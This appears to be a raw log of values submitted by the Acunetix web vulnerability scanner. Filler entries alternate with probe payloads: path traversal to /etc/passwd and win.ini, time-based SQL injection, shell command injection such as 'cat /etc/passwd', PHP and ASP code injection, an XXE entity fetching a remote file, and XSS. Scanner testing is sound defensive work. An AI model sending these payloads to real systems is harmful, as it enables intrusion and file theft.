.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\

Mr.

WEB-INF/web.xml

Mr.

WEB-INF\web.xml

../../../../../../../../../../etc/passwd

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.

1

../../../../../../../../../../etc/passwd.

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.

1

/../..//../..//../..//../..//../..//etc/passwd.

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

/etc/passwd

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

................etc/passwd

1

invalid../../../../../../../../../../etc/passwd/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.

1

file:///etc/passwd

1

/\../\../\../\../\../\../\../etc/passwd

1

WEB-INF/web.xml

1

WEB-INF\web.xml

1

../../../../../../../../../../windows/win.ini

1

../../../../../../../../../../boot.ini

1

../../../../../../../../../../windows/win.ini.

1

windowswin.ini

1

................windowswin.ini

1

..\..\..\..\..\..\..\..\windows\win.ini

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.

1

WEB-INF/web.xml

1

WEB-INF\web.xml

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

SomeCustomInjectedHeader:injected_by_wvs

Mr.

SomeCustomInjectedHeader:injected_by_wvs

Mr.

SomeCustomInjectedHeader:injected_by_wvs

SomeCustomInjectedHeader:injected_by_wvs

1

SomeCustomInjectedHeader:injected_by_wvs

1

SomeCustomInjectedHeader:injected_by_wvs

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

response.write(9706904*9355448)

Mr.

'+response.write(9706904*9355448)+'

Mr.

"+response.write(9706904*9355448)+"

Mr.

${100129+100329}

response.write(9457343*9806426)

1

'+response.write(9457343*9806426)+'

1

"+response.write(9457343*9806426)+"

1

${99665+100211}

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

Mr.

'"()

Mr.

)

1

'"()

1

Mr.

!(()&&!|*|*|

Mr.

^(#$!@#$)(()))******

Mr.

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

Mr.

1some_inexistent_file_with_long_name%00.jpg

Mr.

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

Mr.

testasp.vulnweb.com

)

1

!(()&&!|*|*|

1

^(#$!@#$)(()))******

1

Mr.

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.

1

1some_inexistent_file_with_long_name%00.

1

http://testasp.vulnweb.com/t/fit.txt?%00.

1

testasp.vulnweb.com

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

http://testasp.vulnweb.com/t/xss.html?%00.jpg

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

http://testasp.vulnweb.com/t/fit.txt

http://testasp.vulnweb.com/t/fit.txt

1

Mr.

1

Mr.

1

Mr.

Mr.

268435455

Mr.

h

Mr.

..

Mr.

1e309

Mr.

'"\'\");|]*{ <>''

Mr.

Mr.

1

Mr.

;print(md5(acunetix_wvs_security_test));

Mr.

';print(md5(acunetix_wvs_security_test));$a='

Mr.

";print(md5(acunetix_wvs_security_test));$a="

Mr.

${@print(md5(acunetix_wvs_security_test))}

Mr.

${@print(md5(acunetix_wvs_security_test))}\

;print(md5(acunetix_wvs_security_test));

1

';print(md5(acunetix_wvs_security_test));$a='

1

";print(md5(acunetix_wvs_security_test));$a="

1

${@print(md5(acunetix_wvs_security_test))}

1

${@print(md5(acunetix_wvs_security_test))}\

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

1

268435455

1

h

1

..

1

1e309

1

'"\'\");|]*{ <>''

1

1

Mr.

1

Mr.

acunetix_wvs_invalid_filename

Mr.

frises_creer.php

Mr.

frises_creer.php

Mr.

frises_creer.php/.

Mr.

1

Mr.

1

acunetix_wvs_invalid_filename

1

frises_creer.php

1

frises_creer.php

1

frises_creer.php/.

1

Mr.

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

Mr.

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1 and sleep(4)

Mr.

1 or (sleep(4)+1) limit 1 --

Mr.

1

Mr.

1

Mr.

1' and sleep(4)='

Mr.

1' and (sleep(4)+1) limit 1 --

Mr.

1" and sleep(4)="

Mr.

1' or (sleep(4)+1) limit 1 --

Mr.

1" or (sleep(4)+1) limit 1 --

Mr.

1'=sleep(4)='

Mr.

1"=sleep(4)="

Mr.

1'+(select 1 from (select sleep(4))A)+'

Mr.

1;select pg_sleep(4); --

Mr.

1';select pg_sleep(4); --

Mr.

1; waitfor delay '0:0:4' --

Mr.

1'; waitfor delay '0:0:4' --

Mr.

1"; waitfor delay '0:0:4' --

Mr.

http://www.acunetix.tst

Mr.

<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE acunetix [ <!ENTITY acunetixent SYSTEM "http://testasp.vulnweb.com/t/fit.txt"> ]> <xxx>&acunetixent;</xxx>

<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE acunetix [ <!ENTITY acunetixent SYSTEM "http://testasp.vulnweb.com/t/fit.txt"> ]> <xxx>&acunetixent;</xxx>

1

http://www.acunetix.tst

1

Mr.

1

Mr.

1

Mr.

1

Mr.

'"

Mr.

<!--

'"

1

<!--

1

Mr.

1'"()&%<ScRiPt >prompt(917493)</ScRiPt>

Mr.

1_957283

Mr.

&cat /etc/passwd&

Mr.

'&cat /etc/passwd&'

Mr.

"&cat /etc/passwd&"

Mr.

cat /etc/passwd

Mr.

&cat /etc/passwd&

Mr.

&cat /etc/passwd&

Mr.

`cat /etc/passwd`

Mr.

|cat /etc/passwd#

Mr.

'|'ld

Mr.

"|"ld

Mr.

"|"ld

Mr.

"|"ld

Mr.

"|"ld

Mr.

;cat /etc/passwd;

Mr.

';cat /etc/passwd;'

Mr.

";cat /etc/passwd;"

Mr.

||cat /etc/passwd

Mr.

&dir

Mr.

'&dir&'

Mr.

'&dir&'

Mr.

'&dir&'

Mr.

'&dir&'

Mr.

"&dir&"

Mr.

|dir

Mr.

'|dir

Mr.

"|dir

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.' and sleep(56.192)='

1

Mr.' and (sleep(56.192)+1) limit 1 --

1

Mr." and sleep(56.192)="

1

Mr.' or (sleep(56.192)+1) limit 1 --

1

Mr." or (sleep(56.192)+1) limit 1 --

1

Mr.'=sleep(56.192)='

1

Mr."=sleep(56.192)="

1

Mr.'+(select 1 from (select sleep(56.192))A)+'

1

Mr. and sleep(56.192)

1

Mr. or (sleep(56.192)+1) limit 1 --

1

Mr.';select pg_sleep(56.192); --

1

Mr.'; waitfor delay '0:0:56.192' --

1

Mr."; waitfor delay '0:0:56.192' --

1

Mr.

1

Mr.

1'"

Mr.

\

Mr.

1xa7

Mr.

@@oi6Wj

Mr.

JyI=

Mr.

'"

Mr.

''""

Mr.'"()&%<ScRiPt >prompt(958746)</ScRiPt>

1

Mr._928075

1

acu1883<s1﹥s2ʺs3ʹuca1883

1

acux6887z1z2abcxuca6887

1

Mr.<ScRiPt >prompt(925944)</ScRiPt>

1

Mr.<script>prompt(953924)</script>

1

Mr.<ScRiPt >prompt(980598)</ScRiPt>

1

Mr.<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?905887></ScRiPt>

1

Mr.<ScRiPt >prompt(907847)</ScRiPt>

1

Mr.<video><source onerror="javascript:prompt(984267)">

1

Mr.<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(949196)"></g></svg>

1

Mr.<div style=width:expression(prompt(951999))>

1

Mr.<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='913763'>

1

Mr.<body onload=prompt(902361)>

1

Mr.<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(910077)>

1

Mr.<img src=xyz OnErRor=prompt(956557)>

1

Mr.<img/src=">" onerror=alert(947900)>

1

Mr.%3CScRiPt%20%3Eprompt(950416)%3C/sCripT%3E

1

<img acu onmouseover=prompt(931480) //>

1

Mr.<input autofocus onfocus=prompt(934897)>

1

<a href='http://www.acunetix.com'>website security</a>

1

[url=http://www.acunetix.com]website security[/url]

1

Mr._U4DYb <ScRiPt >prompt(959501)</ScRiPt>

1

Mr.

1

1'"

1

\

1

1xa7

1

@@0Lqyl

1

JyI=

1

'"

1

''""

1

&cat /etc/passwd&

1

'&cat /etc/passwd&'

1

"&cat /etc/passwd&"

1

cat /etc/passwd

1

`cat /etc/passwd`

1

|cat /etc/passwd#

1

'|'ld

1

"|"ld

1

;cat /etc/passwd;

1

';cat /etc/passwd;'

1

";cat /etc/passwd;"

1

||cat /etc/passwd

1

&dir

1

'&dir&'

1

"&dir&"

1

|dir

1

'|dir

1

"|dir

1

Mr.

../../../../../../../../../../etc/passwd

Mr.

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

Mr.

../../../../../../../../../../etc/passwd.jpg

Mr.

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

Mr.

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

Mr.

/../..//../..//../..//../..//../..//etc/passwd.jpg

Mr.

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

Mr.

/etc/passwd

Mr.

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

Mr.

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

Mr.

................etc/passwd

Mr.

invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.

Mr.

file:///etc/passwd

Mr.

/\../\../\../\../\../\../\../etc/passwd

Mr.

WEB-INF/web.xml

Mr.

WEB-INF\web.xml

Mr.

../../../../../../../../../../windows/win.ini

Mr.

../../../../../../../../../../boot.ini

Mr.

../../../../../../../../../../windows/win.ini.jpg

Mr.

windowswin.ini

Mr.

................windowswin.ini

Mr.

..\..\..\..\..\..\..\..\windows\win.ini

Mr.

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

Mr.

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

Mr.

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

Mr.

unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\

Mr.

WEB-INF/web.xml

Mr.

WEB-INF\web.xml

../../../../../../../../../../etc/passwd

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.

1

../../../../../../../../../../etc/passwd.

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.

1

/../..//../..//../..//../..//../..//etc/passwd.

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

/etc/passwd

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

................etc/passwd

1

invalid../../../../../../../../../../etc/passwd/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.

1

file:///etc/passwd

1

/\../\../\../\../\../\../\../etc/passwd

1

WEB-INF/web.xml

1

WEB-INF\web.xml

1

../../../../../../../../../../windows/win.ini

1

../../../../../../../../../../boot.ini

1

../../../../../../../../../../windows/win.ini.

1

windowswin.ini

1

................windowswin.ini

1

..\..\..\..\..\..\..\..\windows\win.ini

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.

1

WEB-INF/web.xml

1

WEB-INF\web.xml

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

SomeCustomInjectedHeader:injected_by_wvs

Mr.

SomeCustomInjectedHeader:injected_by_wvs

Mr.

SomeCustomInjectedHeader:injected_by_wvs

SomeCustomInjectedHeader:injected_by_wvs

1

SomeCustomInjectedHeader:injected_by_wvs

1

SomeCustomInjectedHeader:injected_by_wvs

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

response.write(9136825*9389238)

Mr.

'+response.write(9136825*9389238)+'

Mr.

"+response.write(9136825*9389238)+"

Mr.

${100191+99406}

response.write(9897373*9255808)

1

'+response.write(9897373*9255808)+'

1

"+response.write(9897373*9255808)+"

1

${99014+99477}

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

Mr.

'"()

1

Mr.

)

Mr.

!(()&&!|*|*|

'"()

1

Mr.

^(#$!@#$)(()))******

Mr.

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

Mr.

1some_inexistent_file_with_long_name%00.jpg

Mr.

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

Mr.

testasp.vulnweb.com

)

1

!(()&&!|*|*|

1

^(#$!@#$)(()))******

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.

1

1some_inexistent_file_with_long_name%00.

1

http://testasp.vulnweb.com/t/fit.txt?%00.

1

Mr.

1

testasp.vulnweb.com

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

http://testasp.vulnweb.com/t/xss.html?%00.jpg

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

http://testasp.vulnweb.com/t/fit.txt

http://testasp.vulnweb.com/t/fit.txt

1

Mr.

1

Mr.

1

Mr.

Mr.

268435455

Mr.

h

Mr.

..

Mr.

1e309

Mr.

'"\'\");|]*{ <>''

Mr.

Mr.

1

Mr.

;print(md5(acunetix_wvs_security_test));

Mr.

';print(md5(acunetix_wvs_security_test));$a='

Mr.

";print(md5(acunetix_wvs_security_test));$a="

Mr.

${@print(md5(acunetix_wvs_security_test))}

Mr.

${@print(md5(acunetix_wvs_security_test))}\

;print(md5(acunetix_wvs_security_test));

1

';print(md5(acunetix_wvs_security_test));$a='

1

";print(md5(acunetix_wvs_security_test));$a="

1

${@print(md5(acunetix_wvs_security_test))}

1

${@print(md5(acunetix_wvs_security_test))}\

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

1

268435455

1

h

1

Mr.

1

Mr.

acunetix_wvs_invalid_filename

..

1

Mr.

frises_creer.php

1e309

1

Mr.

frises_creer.php

'"\'\");|]*{ <>''

1

Mr.

